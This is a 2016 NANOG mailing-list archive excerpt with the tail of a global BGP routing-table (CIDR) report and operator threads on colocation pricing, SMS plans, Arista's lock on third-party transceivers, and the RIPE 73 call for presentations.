AfriNIC Region Analysis Summary
-------------------------------

Prefixes being announced by AfriNIC Region ASes: 14463
Total AfriNIC prefixes after maximum aggregation: 3274
AfriNIC Deaggregation factor: 4.42
Prefixes being announced from the AfriNIC address blocks: 16443
Unique aggregates announced from the AfriNIC address blocks: 6106
AfriNIC Region origin ASes present in the Internet Routing Table: 737
AfriNIC Prefixes per ASN: 22.31
AfriNIC Region origin ASes announcing only one prefix: 173
AfriNIC Region transit ASes present in the Internet Routing Table: 179
Average AfriNIC Region AS path length visible: 4.5
Max AfriNIC Region AS path length visible: 20
Number of AfriNIC region 32-bit ASNs visible in the Routing Table: 245
Number of AfriNIC addresses announced to Internet: 81057280
Equivalent to 4 /8s, 212 /16s and 214 /24s
AfriNIC AS Blocks      36864-37887, 327680-328703 & ERX transfers
AfriNIC Address Blocks 41/8, 102/8, 105/8, 154/8, 196/8, 197/8,

APNIC Region per AS prefix count summary
----------------------------------------

  ASN   No of nets  /20 equiv  MaxAgg  Description
 4538     5551        4190       74    ERX-CERNET-BKB China Education and Rese
 7545     3496         385      256    TPG-INTERNET-AP TPG Telecom Limited, AU
 4766     3200       11145     1130    KIXS-AS-KR Korea Telecom, KR
17974     2939         904       78    TELKOMNET-AS2-AP PT Telekomunikasi Indo
 9829     2659        1494      526    BSNL-NIB National Internet Backbone, IN
 9808     2144        8781       42    CMNET-GD Guangdong Mobile Communication
 4755     2056         429      227    TATACOMM-AS TATA Communications formerl
 4808     1759        2293      533    CHINA169-BJ China Unicom Beijing Provin
24560     1531         505      217    AIRTELBROADBAND-AS-AP Bharti Airtel Ltd
38197     1514          94      286    SUNHK-DATA-AS-AP Sun Network (Hong Kong

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-APNIC

ARIN Region per AS prefix count summary
---------------------------------------

  ASN   No of nets  /20 equiv  MaxAgg  Description
22773     3494        2964      144    ASN-CXA-ALL-CCI-22773-RDC - Cox Communi
 6389     2227        3671       41    BELLSOUTH-NET-BLK - BellSouth.net Inc.,
18566     2194         405      110    MEGAPATH5-US - MegaPath Corporation, US
20115     1936        1965      402    CHARTER-NET-HKY-NC - Charter Communicat
30036     1745         341      281    MEDIACOM-ENTERPRISE-BUSINESS - Mediacom
  209     1714        5082      655    CENTURYLINK-US-LEGACY-QWEST - Qwest Com
 6983     1688         849      228    ITCDELTA - Earthlink, Inc., US
16509     1382        2530      447    AMAZON-02 - Amazon.com, Inc., US
 7018     1343       20058      997    ATT-INTERNET4 - AT&T Services, Inc., US
  701     1289       10719      696    UUNET - MCI Communications Services, In

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-ARIN

RIPE Region per AS prefix count summary
---------------------------------------

  ASN   No of nets  /20 equiv  MaxAgg  Description
39891     3329         169       15    ALJAWWALSTC-AS , SA
20940     2763        1063     1967    AKAMAI-ASN1 , US
34984     1983         327      357    TELLCOM-AS , TR
12479     1315        1018       46    UNI2-AS , ES
 8551     1213         377       46    BEZEQ-INTERNATIONAL-AS Bezeqint Interne
 6849     1148         355       21    UKRTELNET , UA
13188     1097          98       64    BANKINFORM-AS , UA
 8402     1002         544       15    CORBINA-AS Russia, RU
 9198      928         352       25    KAZTELECOM-AS , KZ
 6830      886        2752      465    LGI-UPC formerly known as UPC Broadband

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-RIPE

LACNIC Region per AS prefix count summary
-----------------------------------------

  ASN   No of nets  /20 equiv  MaxAgg  Description
10620     3477         541      154    Telmex Colombia S.A., CO
 8151     2266        3361      544    Uninet S.A. de C.V., MX
 7303     1539         949      243    Telecom Argentina S.A., AR
 6503     1415         437       55    Axtel, S.A.B. de C.V., MX
11830     1344         368       65    Instituto Costarricense de Electricidad
 6147     1076         377       27    Telefonica del Peru S.A.A., PE
 7738      994        1882       40    Telemar Norte Leste S.A., BR
 3816      956         459      212    COLOMBIA TELECOMUNICACIONES S.A. ESP, C
11172      907         125       76    Alestra, S. de R.L. de C.V., MX
28573      896        2180      158    CLARO S.A., BR

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-LACNIC

AfriNIC Region per AS prefix count summary
------------------------------------------

  ASN   No of nets  /20 equiv  MaxAgg  Description
24863     1184         402       48    LINKdotNET-AS, EG
36903      651         327      118    MT-MPLS, MA
37611      649          48        2    Afrihost, ZA
36992      539        1357       26    ETISALAT-MISR, EG
 8452      524        1472       15    TE-AS TE-AS, EG
37492      380         246       69    ORANGE-TN, TN
24835      348         610       16    RAYA-AS, EG
29571      301          37       12    CITelecom-AS, CI
15399      293          35        6    WANANCHI-KE, KE
 2018      264         327       74    TENET-1, ZA

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet-AFRINIC

Global Per AS prefix count summary
----------------------------------

  ASN   No of nets  /20 equiv  MaxAgg  Description
 4538     5551        4190       74    ERX-CERNET-BKB China Education and Rese
 7545     3496         385      256    TPG-INTERNET-AP TPG Telecom Limited, AU
22773     3494        2964      144    ASN-CXA-ALL-CCI-22773-RDC - Cox Communi
10620     3477         541      154    Telmex Colombia S.A., CO
39891     3329         169       15    ALJAWWALSTC-AS , SA
 4766     3200       11145     1130    KIXS-AS-KR Korea Telecom, KR
17974     2939         904       78    TELKOMNET-AS2-AP PT Telekomunikasi Indo
20940     2763        1063     1967    AKAMAI-ASN1 , US
 9829     2659        1494      526    BSNL-NIB National Internet Backbone, IN
 8151     2266        3361      544    Uninet S.A. de C.V., MX

Complete listing at http://thyme.rand.apnic.net/current/data-ASnet

Global Per AS Maximum Aggr summary
----------------------------------

  ASN   No of nets  Net Savings  Description
22773     3494         3350      ASN-CXA-ALL-CCI-22773-RDC - Cox Communi
10620     3477         3323      Telmex Colombia S.A., CO
39891     3329         3314      ALJAWWALSTC-AS , SA
 7545     3496         3240      TPG-INTERNET-AP TPG Telecom Limited, AU
17974     2939         2861      TELKOMNET-AS2-AP PT Telekomunikasi Indo
 6389     2227         2186      BELLSOUTH-NET-BLK - BellSouth.net Inc.,
 9829     2659         2133      BSNL-NIB National Internet Backbone, IN
 9808     2144         2102      CMNET-GD Guangdong Mobile Communication
18566     2194         2084      MEGAPATH5-US - MegaPath Corporation, US
 4766     3200         2070      KIXS-AS-KR Korea Telecom, KR

Complete listing at http://thyme.rand.apnic.net/current/data-CIDRnet

List of Unregistered Origin ASNs (Global)
-----------------------------------------

Bad AS  Designation  Network             Transit AS  Description
65001   PRIVATE      5.143.176.0/20      15468       KLGELECS-AS 38, Teatralnaya st
65001   PRIVATE      31.172.192.0/20     15468       KLGELECS-AS 38, Teatralnaya st
65001   PRIVATE      31.172.192.0/21     15468       KLGELECS-AS 38, Teatralnaya st
65001   PRIVATE      31.172.200.0/21     15468       KLGELECS-AS 38, Teatralnaya st
65001   PRIVATE      31.172.208.0/21     15468       KLGELECS-AS 38, Teatralnaya st
65001   PRIVATE      31.172.216.0/21     15468       KLGELECS-AS 38, Teatralnaya st
65000   PRIVATE      31.219.177.0/25     8966        ETISALAT-AS P.O. Box 1150, Dub
65000   PRIVATE      31.219.177.128/25   8966        ETISALAT-AS P.O.
Box 1150, Dub 65412 PRIVATE 41.89.7.0/24 36866 JTL, KE 65512 PRIVATE 45.252.244.0/24 45899 VNPT-AS-VN VNPT Corp, VN Complete listing at http://thyme.rand.apnic.net/current/data-badAS Advertised Unallocated Addresses -------------------------------- Network Origin AS Description 23.249.144.0/20 40430 COLO4JAX-AS - colo4jax, LLC, US 27.100.7.0/24 56096 UNKNOWN 41.73.1.0/24 37004 -Reserved AS-, ZZ 41.73.2.0/24 37004 -Reserved AS-, ZZ 41.73.3.0/24 37004 -Reserved AS-, ZZ 41.73.4.0/24 37004 -Reserved AS-, ZZ 41.73.5.0/24 37004 -Reserved AS-, ZZ 41.73.6.0/24 37004 -Reserved AS-, ZZ 41.73.7.0/24 37004 -Reserved AS-, ZZ 41.73.8.0/24 37004 -Reserved AS-, ZZ Complete listing at http://thyme.rand.apnic.net/current/data-add-IANA Number of prefixes announced per prefix length (Global) ------------------------------------------------------- /1:0 /2:0 /3:0 /4:0 /5:0 /6:0 /7:0 /8:16 /9:13 /10:36 /11:101 /12:266 /13:516 /14:1049 /15:1769 /16:13136 /17:7794 /18:12731 /19:25299 /20:38387 /21:40059 /22:67338 /23:59077 /24:336969 /25:567 /26:581 /27:386 /28:53 /29:32 /30:14 /31:1 /32:34 Advertised prefixes smaller than registry allocations ----------------------------------------------------- ASN No of nets Total ann. 
Description 39891 2896 3329 ALJAWWALSTC-AS , SA 22773 2723 3494 ASN-CXA-ALL-CCI-22773-RDC - Cox Communi 18566 2086 2194 MEGAPATH5-US - MegaPath Corporation, US 30036 1560 1745 MEDIACOM-ENTERPRISE-BUSINESS - Mediacom 6389 1438 2227 BELLSOUTH-NET-BLK - BellSouth.net Inc., 10620 1389 3477 Telmex Colombia S.A., CO 6983 1339 1688 ITCDELTA - Earthlink, Inc., US 34984 1266 1983 TELLCOM-AS , TR 11492 1166 1263 CABLEONE - CABLE ONE, INC., US 6849 968 1148 UKRTELNET , UA Complete listing at http://thyme.rand.apnic.net/current/data-sXXas-nos Number of /24s announced per /8 block (Global) ---------------------------------------------- 1:1645 2:764 4:20 5:2146 6:31 8:983 12:1769 13:42 14:1755 15:45 16:2 17:92 18:125 20:50 22:1 23:1621 24:1792 27:2293 31:1782 32:69 33:4 35:5 36:325 37:2372 38:1249 39:36 40:94 41:2878 42:446 43:1868 44:44 45:2155 46:2545 47:85 49:1197 50:902 51:12 52:543 54:348 55:6 56:7 57:42 58:1639 59:1001 60:378 61:1812 62:1507 63:1929 64:4549 65:2182 66:4239 67:2205 68:1125 69:3261 70:1255 71:485 72:2006 74:2546 75:348 76:406 77:1426 78:1263 79:854 80:1276 81:1396 82:978 83:714 84:856 85:1593 86:491 87:1089 88:543 89:2060 90:214 91:6091 92:948 93:2326 94:2438 95:2481 96:504 97:353 98:943 99:41 100:78 101:1091 103:12006 104:2517 105:124 106:434 107:1329 108:648 109:2216 110:1283 111:1661 112:1042 113:1244 114:1073 115:1671 116:1639 117:1540 118:2025 119:1574 120:921 121:1115 122:2249 123:2026 124:1583 125:1821 128:631 129:426 130:412 131:1363 132:601 133:176 134:475 135:144 136:384 137:394 138:1820 139:423 140:547 141:456 142:660 143:944 144:733 145:163 146:937 147:655 148:1387 149:539 150:653 151:872 152:638 153:315 154:652 155:956 156:523 157:498 158:382 159:1149 160:511 161:730 162:2387 163:562 164:907 165:1076 166:321 167:1171 168:2051 169:664 170:1854 171:259 172:667 173:1665 174:756 175:694 176:1735 177:4029 178:2207 179:1162 180:2145 181:1824 182:2024 183:974 184:819 185:7204 186:3117 187:2131 188:2173 189:1728 190:7695 191:1270 192:9009 193:5729 
194:4444 195:3843 196:1730 197:1130 198:5536 199:5733 200:7124 201:3644 202:10100 203:9840 204:4500 205:2727 206:2971 207:3083 208:4035 209:3868 210:3874 211:2068 212:2723 213:2338 214:852 215:70 216:5847 217:1984 218:798 219:608 220:1639 221:882 222:691 223:1278 End of report From ivanov_andrei at yahoo.com Thu Aug 18 00:42:37 2016 From: ivanov_andrei at yahoo.com (Andrei Ivanov) Date: Thu, 18 Aug 2016 00:42:37 +0000 (UTC) Subject: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit In-Reply-To: <3B718C9D-09BA-43C7-AD33-54949BC21F27@mtin.net> References: <3B718C9D-09BA-43C7-AD33-54949BC21F27@mtin.net> Message-ID: <1572457311.15914129.1471480957881.JavaMail.yahoo@mail.yahoo.com> In San Francisco, CA one can get a cabinet with redundant A+B power, 120V/30A per circuit, for under $2,000/month.208V circuits will be more expensive.--andrei From: Justin Wilson To: NANOG Sent: Wednesday, August 17, 2016 3:20 PM Subject: Re: Comparing carrier hotels and colo: How much are you paying per 208V 30A circuit Indiana Data Centers: $600-900 per lit rack Chicago $1800 per lit rack Ohio $700-900 per lit rack Justin Wilson j2sw at mtin.net --- http://www.mtin.net Owner/CEO xISP Solutions- Consulting ? Data Centers - Bandwidth http://www.midwest-ix.com COO/Chairman Internet Exchange - Peering - Distributed Fabric > On Aug 17, 2016, at 12:37 PM, Eric Kuhnke wrote: > > a) How much, in $/mo > > b) To what degree is it protected (1+0 generator, 1+1 generator, N+1 > generator, single UPS, 1+1 UPS, etc). > > c) What extent of diversity were you able to obtain vs. your other AC > circuits (unique riser?? separate transformer?? separate power feed from > second route into the building?) 
>

From sean.watkins at gmail.com  Thu Aug 18 18:49:25 2016
From: sean.watkins at gmail.com (Sean Watkins)
Date: Thu, 18 Aug 2016 12:49:25 -0600
Subject: cheap SMS, was Email to text -
In-Reply-To:
References: <20160818175135.16264.qmail@ary.lan>
Message-ID:

Ting's pricing looks really good.
Anyone know of an equiv in Canada?

Sean

On Thu, Aug 18, 2016 at 11:59 AM, Eric Kuhnke wrote:

> The "Ting" MVNO is owned/run by the Tucows people (remember them!) and runs
> on either Sprint or T-Mobile's network depending on where you are.
>
> For very low data rate OOB access type things it can be as low as $10/mo
> for an active LTE SIM card.
>
> https://ting.com/rates?ab=1
>
>
>
> On Thu, Aug 18, 2016 at 10:51 AM, John Levine wrote:
>
> > >Then I went into a t-mobile store and bought a few $25/mo SIM cards, put
> > credit card on file to auto renew each month, slapped them in, and
> pointed
> > our NMS's at them.
> >
> > Since this comes up from time to time, here's the cheapest US SIM plans I
> > know of.
> >
> > Tracfone BYOD runs on AT&T or Verizon (the latter is LTE only) and the
> > cheapest plan is $18 for 90 days if you sign up and autorenew. That
> > gives you 180 SMS. and if you want them 180 mins of voice and 180MB of
> > data, unused rolls over. Customer service is OK, seems to be in the
> > US, aimed at a bilingual Spanish/English market.
> >
> > Airvoice Wireless runs on AT&T. Their $10/mo plan is good for 500
> > SMS/mo, no rollover. Their $20/mo plan has unmetered SMS and voice.
> > They have very good US-based customer service.
> >
> > R's,
> > John
> >
>

--
--
Sean Watkins
403-629-6152

From john at hypergeek.net  Thu Aug 18 21:42:54 2016
From: john at hypergeek.net (John A. Kilpatrick)
Date: Thu, 18 Aug 2016 14:42:54 -0700 (PDT)
Subject: Arista unqualified SFP
In-Reply-To: <57B5AD1A.90408@foobar.org>
References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> <57B5AD1A.90408@foobar.org>
Message-ID:

On Thu, 18 Aug 2016, Nick Hilliard wrote:

> It is always better to clarify this sort of thing with the account
> management team before purchasing, and preferably have it in email or
> writing.

Exactly. Especially if you already have optics vendors that you like. I would bake that into the eval.

--
John A. Kilpatrick
john at hypergeek.net | http://www.hypergeek.net/
remember: no obstacles/only challenges

From jackson.tim at gmail.com  Sun Aug 21 02:14:47 2016
From: jackson.tim at gmail.com (Tim Jackson)
Date: Sat, 20 Aug 2016 21:14:47 -0500
Subject: Arista unqualified SFP
In-Reply-To: <57B5AD1A.90408@foobar.org>
References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> <239960167-1471519756-cardhu_decombobulator_blackberry.rim.net-2145176334-@b16.c1.bise6.blackberry> <83812ea0-e10d-35c3-7677-51403c20bbbf@seacom.mu> <57B5AD1A.90408@foobar.org>
Message-ID:

On Aug 18, 2016 7:42 AM, "Nick Hilliard" wrote:

> It is always better to clarify this sort of thing with the account
> management team before purchasing, and preferably have it in email or
> writing.

Sometimes you inherit bad situations...

The (bad) solution is to program your own optics to match Arista ones so their switches can't tell the difference.. It's not hard, but a lot of the time it's out of the normal reach of a lot of customers.

Flexoptix fixed that problem, but they're still priced way too high vs the OEMs that supply to them..

It's still terribly frustrating to deal with this issue in 2016. It's a desperate money grab from less informed customers. Arista should really stop this bad practice.
I'd urge anybody buying any gear to make sure it can accept any optic meeting whatever MSA standard optics that it's able to have plugged into it.

--
Tim

From johnl at iecc.com  Sun Aug 21 03:03:41 2016
From: johnl at iecc.com (John Levine)
Date: 21 Aug 2016 03:03:41 -0000
Subject: cheap SMS, was Email to text -
In-Reply-To:
Message-ID: <20160821030341.24511.qmail@ary.lan>

>Ting's pricing looks really good.
>Anyone know of an equiv in Canada?

There isn't one. Ting is run by Tucows who are located in Toronto. They'd love to provide similar service in Canada, but the network operators aren't interested.

R's,
John

From john at west-canaan.net  Mon Aug 22 17:04:51 2016
From: john at west-canaan.net (John Zettlemoyer)
Date: Mon, 22 Aug 2016 13:04:51 -0400
Subject: Lenovo & messagelabs
Message-ID:

We are getting multiples of Lenovo sales email in the last hour.
The same sales email has come across about every 3 minutes for the last 30 minutes.
I wrote "STOP" back to one of them, and now messagelabs has sent me a "The following recipient(s) cannot be reached" message about 6 times.

Could someone from messagelabs or Lenovo please contact me off list.

Thank you

John Zettlemoyer
Sr. Director of I.T. Infrastructure :: WCiT - West-Canaan LLC
856.310.1375 x221 :: john at wcit.net :: www.wcit.net
Colocation, Cloud, Dedicated, Email, Backups, Access, Networks, etc.
"I keep the lights blinking out of sequence!"

From dwhite at olp.net  Mon Aug 22 21:19:48 2016
From: dwhite at olp.net (Dan White)
Date: Mon, 22 Aug 2016 16:19:48 -0500
Subject: GoDaddy Contact
Message-ID: <20160822211948.GK8444@dan.olp.net>

Please contact me off list.

--
Dan White
BTC Broadband
Network Admin Lead
Ph 918.366.0248 (direct)   main: (918)366-8000
Fax 918.366.6610           email: dwhite at olp.net
http://www.btcbroadband.com

From benno at NLnetLabs.nl  Tue Aug 23 10:59:39 2016
From: benno at NLnetLabs.nl (Benno Overeinder)
Date: Tue, 23 Aug 2016 12:59:39 +0200
Subject: 2nd call for presentations RIPE 73
Message-ID: <9ff22bd1-2d19-a372-da3f-2648749b015b@NLnetLabs.nl>

Dear colleagues,

Please note the approaching deadline of 28 August 2016 for RIPE 73 plenary programme submissions.

You can find the CFP for RIPE 73 below or at https://ripe73.ripe.net/submit-topic/cfp/, for your proposals for plenary session presentations, tutorials, workshops, BoFs (Birds of a Feather sessions) and lightning talks.

Please also note that speakers do not receive any extra reduction or funding towards the meeting fee at the RIPE Meetings.

Kind regards,

Benno Overeinder
RIPE PC Chair
https://www.ripe.net/participate/meetings/ripe-meetings/pc

-------------------->>><<<--------------------

Call for Presentations

A RIPE Meeting is an open event where Internet Service Providers, network operators and other interested parties get together. Although the meeting is mostly technical, it is also a chance for people to meet and network with others in their field.

RIPE 73 will take place from 24-28 October 2016 in Madrid, Spain.

The RIPE Programme Committee (PC) is now seeking content proposals from the RIPE community for the plenary sessions, BoFs (Birds of a Feather sessions), panels, workshops, tutorials and lightning talks at RIPE 73. See the full descriptions of the different presentation formats, https://ripe73.ripe.net/submit-topic/presentation-formats/.

Proposals for plenary sessions, BoFs, panels, workshops and tutorials must be submitted for full consideration no later than 28 August 2016. Proposals submitted after this date will be considered depending on the remaining available space in the programme.

The PC is looking for presentations covering topics of network engineering and operations, including but not limited to:

- IPv6 deployment
- Managing IPv4 scarcity in operations
- Commercial transactions of IPv4 addresses
- Data centre technologies
- Network and DNS operations
- Internet governance and regulatory practices
- Network and routing security
- Content delivery
- Internet peering and mobile data exchange
- Internet of Things (IoT)

Submissions

RIPE Meeting attendees are quite sensitive to keeping presentations non-commercial, and product marketing talks are strongly discouraged. Repeated audience feedback shows that the most successful talks focus on operational experience, research results, or case studies. For example, presenters wishing to describe a commercial solution should focus on the underlying technology and not attempt a product demonstration.

Presenters should indicate how much time they will require. In general, the time allocated for the different presentation formats is as follows:

- Plenary presentations: 20-25 minutes presentation with 5-10 minutes discussion
- Tutorials: up to two hours (Monday morning)
- Workshops: one hour (during evening sessions) to two hours (Monday morning)
- BoFs: approximately one hour
- Lightning talks: 10 minutes

The following general requirements apply:

- Proposals must be submitted using the meeting submission system, https://ripe73.ripe.net/submit-topic/submission-form/.
- Lightning talks should also be submitted using the meeting submission system (https://ripe73.ripe.net/submit-topic/submission-form/) and can be submitted any time up to and including the meeting week. The allocation of lightning talks will be announced on short notice---in some cases on the same day but often one day prior to the time slot allocated.
- Presenters who propose a panel or BoF are encouraged to include speakers from several (perhaps even competing) companies and/or a neutral facilitator.
- All presentation proposals will only be considered by the PC if they contain at least draft presentation slides (slides may be updated later on). For panels, proposals must contain a clear description, as well as the names of invited panellists, presenters and moderators.
- Due to potential technical issues, presenters/panellists should be physically present at the RIPE Meeting.

If you have any questions or requests concerning content submissions, please email pc [at] ripe [dot] net.

--
Benno J. Overeinder
NLnet Labs
http://www.nlnetlabs.nl/

From amitchell at isipp.com  Tue Aug 23 14:21:36 2016
From: amitchell at isipp.com (Anne Mitchell)
Date: Tue, 23 Aug 2016 08:21:36 -0600
Subject: GoDaddy Contact
In-Reply-To:
References:
Message-ID: <18CB9BBF-E1A3-4357-A88A-7DAEC97914E1@isipp.com>

> Please contact me off list.

Dan, if you'd like to let me know what this is about, we can probably connect you with someone.

Anne

Anne P. Mitchell,
Attorney at Law
Legislative Consultant
CEO/President, SuretyMail Email Reputation Certification and Inbox Delivery Assistance
http://www.SuretyMail.com/
http://www.SuretyMail.eu/

Available for consultations by special arrangement.

Author: Section 6 of the CAN-SPAM Act of 2003 (the Federal anti-spam law)
Member, California Bar Cyberspace Law Committee
Member, Colorado Cybersecurity Consortium
Member, Asilomar Microcomputer Workshop Committee
Ret. Professor of Law, Lincoln Law School of San Jose
Ret. Chair, Asilomar Microcomputer Workshop
amitchell at isipp.com | @AnnePMitchell
Facebook/AnnePMitchell | LinkedIn/in/annemitchell

From ryan.g at atwgpc.net  Tue Aug 23 14:58:36 2016
From: ryan.g at atwgpc.net (Ryan Gelobter)
Date: Tue, 23 Aug 2016 09:58:36 -0500
Subject: Arista unqualified SFP
In-Reply-To:
References: <22a54cac8cc717f87acfedf74e146cae@nek0.net>
Message-ID:

Instead of patching the python what happens if you just run 'no errdisable recovery cause xcvr-unsupported'

On Thu, Aug 18, 2016 at 5:24 AM, Stanislaw wrote:

> Hi all,
> If somebody is following my epic adventure of getting unqualified SFP to
> work on Aristas, here is the unhappy end of it.
>
> I've written to Arista support and got the following dialogue:
> Support guy:
> Hi,
> Thank you for contacting Arista Support. My name is **** and I'll be
> assisting you on this case.
> Could you please provide the "show version" output from this switch?
>
> Me:
> Hi,
> Here it is:
>
>
> Support guy:
> Hi,
> Thank you for the information.
> Unfortunately, we are unable to activate your 3rd party components. To
> ensure ongoing quality, Arista devices are designed to support only
> properly qualified transceivers.
> Please let me know if you have any other questions.
>
> Me:
> I do not understand,
> But there is a command which allows using non-Arista transceivers. Why
> have you implemented it but don't provide an access key to your customers
> when they ask for it?
> If it is required to sign some papers which declare that I am aware of all
> the risks and losing my warranty - I agree with that, let's do it. Any way
> what are the conditions to receive that access key?
>
> Support guy:
> I'm afraid that there is nothing I'm able to do regarding this situation.
> If you have any other questions regarding enabling 3rd party options in
> Arista switches, I suggest to contact your local account team (or sales)
> for further discussion on this matter.
>
>
> Next, I've tried inserting various QSFP+ DAC cables I have - none of them
> has been even detected on the switch, it was acting like nothing has been
> inserted. I guess that even if I get the key, most of my transceivers/DAC
> (which work like a champ in Juniper or Extreme switches) cables wouldn't
> work.
>
> I'm writing this post to make somebody who considers buying their switches
> be aware of what they'd get. Just buy Juniper instead.
>
>
>
> Stanislaw wrote at 2016-08-17 23:25:
>
>> Hi Tim,
>>
>> Thanks for your expressive answer. Will try it :)
>>
>> Tim Jackson wrote at 2016-08-17 22:57:
>>
>> I'd suggest bitching and moaning at your account team & support until
>>> they give you the key to unlock them..
>>>
>>> --
>>> Tim
>>>
>>> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote:
>>>
>>> Hi all,
>>>> Is there a way for unlocking off-brand transceivers usage on Arista
>>>> switches?
>>>>
>>>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has
>>>> been found out that Arista switches seem to not have possibility to unlock
>>>> off-brand xceivers usage (by some service command or so).
>>>>
>>>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the
>>>> checking function bypass the actual check and it helped: ports are not in
>>>> errdisable state anymore. But despite of xceivers are detected correctly,
>>>> links aren't coming up (they are in notconnect state).
>>>>
>>>> If anyone possibly have does have a sacred knowledge of bringing
>>>> off-branded transceivers to life on Arista switches, your help'd be very
>>>> appreciated. Thanks.
>>>>
>>>

From sryan at arbor.net  Tue Aug 23 15:00:35 2016
From: sryan at arbor.net (Ryan, Spencer)
Date: Tue, 23 Aug 2016 15:00:35 +0000
Subject: Arista unqualified SFP
In-Reply-To:
References: <22a54cac8cc717f87acfedf74e146cae@nek0.net> ,
Message-ID:

It won't work. They require the hashed key that support/your AM has to generate for your org.

Spencer Ryan | Senior Systems Administrator | sryan at arbor.net
Arbor Networks
+1.734.794.5033 (d) | +1.734.846.2053 (m)
www.arbornetworks.com

________________________________
From: NANOG on behalf of Ryan Gelobter
Sent: Tuesday, August 23, 2016 10:58:36 AM
To: Stanislaw
Cc: nanog list
Subject: Re: Arista unqualified SFP

Instead of patching the python what happens if you just run 'no errdisable recovery cause xcvr-unsupported'

On Thu, Aug 18, 2016 at 5:24 AM, Stanislaw wrote:

> Hi all,
> If somebody is following my epic adventure of getting unqualified SFP to
> work on Aristas, here is the unhappy end of it.
>
> I've written to Arista support and got the following dialogue:
> Support guy:
> Hi,
> Thank you for contacting Arista Support. My name is **** and I'll be
> assisting you on this case.
> Could you please provide the "show version" output from this switch?
>
> Me:
> Hi,
> Here it is:
>
>
> Support guy:
> Hi,
> Thank you for the information.
> Unfortunately, we are unable to activate your 3rd party components. To
> ensure ongoing quality, Arista devices are designed to support only
> properly qualified transceivers.
> Please let me know if you have any other questions.
>
> Me:
> I do not understand,
> But there is a command which allows using non-Arista transceivers. Why
> have you implemented it but don't provide an access key to your customers
> when they ask for it?
> If it is required to sign some papers which declare that I am aware of all
> the risks and losing my warranty - I agree with that, let's do it. Any way
> what are the conditions to receive that access key?
>
> Support guy:
> I'm afraid that there is nothing I'm able to do regarding this situation.
> If you have any other questions regarding enabling 3rd party options in
> Arista switches, I suggest to contact your local account team (or sales)
> for further discussion on this matter.
>
>
> Next, I've tried inserting various QSFP+ DAC cables I have - none of them
> has been even detected on the switch, it was acting like nothing has been
> inserted. I guess that even if I get the key, most of my transceivers/DAC
> (which work like a champ in Juniper or Extreme switches) cables wouldn't
> work.
>
> I'm writing this post to make somebody who considers buying their switches
> be aware of what they'd get. Just buy Juniper instead.
>
>
>
> Stanislaw wrote at 2016-08-17 23:25:
>
>> Hi Tim,
>>
>> Thanks for your expressive answer. Will try it :)
>>
>> Tim Jackson wrote at 2016-08-17 22:57:
>>
>> I'd suggest bitching and moaning at your account team & support until
>>> they give you the key to unlock them..
>>>
>>> --
>>> Tim
>>>
>>> On Wed, Aug 17, 2016 at 2:50 PM, Stanislaw wrote:
>>>
>>> Hi all,
>>>> Is there a way for unlocking off-brand transceivers usage on Arista
>>>> switches?
>>>>
>>>> I've got an Arista 7050QX switch with 4.14 EOS version. Then it has
>>>> been found out that Arista switches seem to not have possibility to unlock
>>>> off-brand xceivers usage (by some service command or so).
>>>>
>>>> I've patched /usr/lib/python2.7/site-packages/XcvrAgent.py, made the
>>>> checking function bypass the actual check and it helped: ports are not in
>>>> errdisable state anymore. But despite of xceivers are detected correctly,
>>>> links aren't coming up (they are in notconnect state).
>>>>
>>>> If anyone possibly have does have a sacred knowledge of bringing
>>>> off-branded transceivers to life on Arista switches, your help'd be very
>>>> appreciated. Thanks.
>>>>
>>>

From ryan.g at atwgpc.net  Tue Aug 23 19:05:52 2016
From: ryan.g at atwgpc.net (Ryan Gelobter)
Date: Tue, 23 Aug 2016 14:05:52 -0500
Subject: Arista unqualified SFP
In-Reply-To:
References: <22a54cac8cc717f87acfedf74e146cae@nek0.net>
Message-ID:

But that is all done in the python script I imagine, it doesn't look like there's really much validation unless I'm missing something.
Shouldn't be too hard to figure out what it's doing in the background after you run that command.

On Tue, Aug 23, 2016 at 10:00 AM, Ryan, Spencer wrote:

> It won't work. They require the hashed key that support/your AM has to
> generate for your org.
>
>
>
> * Spencer Ryan* | Senior Systems Administrator | sryan at arbor.net
> *Arbor Networks*
> +1.734.794.5033 (d) | +1.734.846.2053 (m)
> www.arbornetworks.com
>
> ------------------------------
> *From:* NANOG on behalf of Ryan Gelobter <
> ryan.g at atwgpc.net>
> *Sent:* Tuesday, August 23, 2016 10:58:36 AM
> *To:* Stanislaw
> *Cc:* nanog list
> *Subject:* Re: Arista unqualified SFP
>
> Instead of patching the python what happens if you just run 'no errdisable
> recovery cause xcvr-unsupported'
>
> On Thu, Aug 18, 2016 at 5:24 AM, Stanislaw wrote:
>
> > Hi all,
> > If somebody is following my epic adventure of getting unqualified SFP to
> > work on Aristas, here is the unhappy end of it.
> >
> > I've written to Arista support and got the following dialogue:
> > Support guy:
> > Hi,
> > Thank you for contacting Arista Support. My name is **** and I'll be
> > assisting you on this case.
> > Could you please provide the "show version" output from this switch?
> >
> > Me:
> > Hi,
> > Here it is:
> >
> >
> > Support guy:
> > Hi,
> > Thank you for the information.
> > Unfortunately, we are unable to activate your 3rd party components. To
> > ensure ongoing quality, Arista devices are designed to support only
> > properly qualified transceivers.
> > Please let me know if you have any other questions.
> >
> > Me:
> > I do not understand,
> > But there is a command which allows using non-Arista transceivers. Why
> > have you implemented it but don't provide an access key to your customers
> > when they ask for it?
> > If it is required to sign some papers which declare that I am aware of
> all
> > the risks and losing my warranty - I agree with that, let's do it. Any way
> > what are the conditions to receive that access key?
> >
> > Support guy:
> > I'm afraid that there is nothing I'm able to do regarding this situation.
> > If you have any other questions regarding enabling 3rd party options in
> > Arista switches, I suggest to contact your local account team (or sales)
> > for further discussion on this matter.
> >
> >
> > Next, I've tried inserting various QSFP+ DAC cables I have - none of them
> > has been even detected on the switch, it was acting like nothing has been
> > inserted. I guess that even if I get the key, most of my transceivers/DAC
> > (which work like a champ in Juniper or Extreme switches) cables wouldn't
